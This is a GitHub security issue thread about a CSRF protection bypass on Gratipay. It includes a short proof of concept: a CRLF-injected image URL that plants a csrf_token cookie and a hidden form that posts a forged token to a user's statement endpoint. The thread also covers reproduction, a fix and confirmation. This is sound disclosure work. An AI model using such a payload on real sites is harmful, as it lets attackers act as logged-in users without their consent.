-
Notifications
You must be signed in to change notification settings - Fork 2
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CSRF Protection Bypass #1
Comments
I tried with this poc, and was not able to reproduce his result (except when I was logged in as the target, or as an admin): <img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">
<form action="https://gratipay.com/~lgtest/statement.json" method="POST">
<input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<input type="hidden" name="lang" value="en">
<input type="input" name="content">
<button type="submit">Submit</button>
</form> |
To: [researcher]
|
From: [researcher]
|
Right. The point of a CSRF is to initiate an action on Gratipay for a logged-in user, when that logged-in user visits a third-party website. My poc reconstruction was accurate, I was just not interpreting the results properly. |
To: [researcher]
|
Deploying gratipay/security-qf35us#2 ought to fix this. |
Confirmed fixed. |
To: researcher
|
https://gratipay.freshdesk.com/helpdesk/tickets/2305
The text was updated successfully, but these errors were encountered: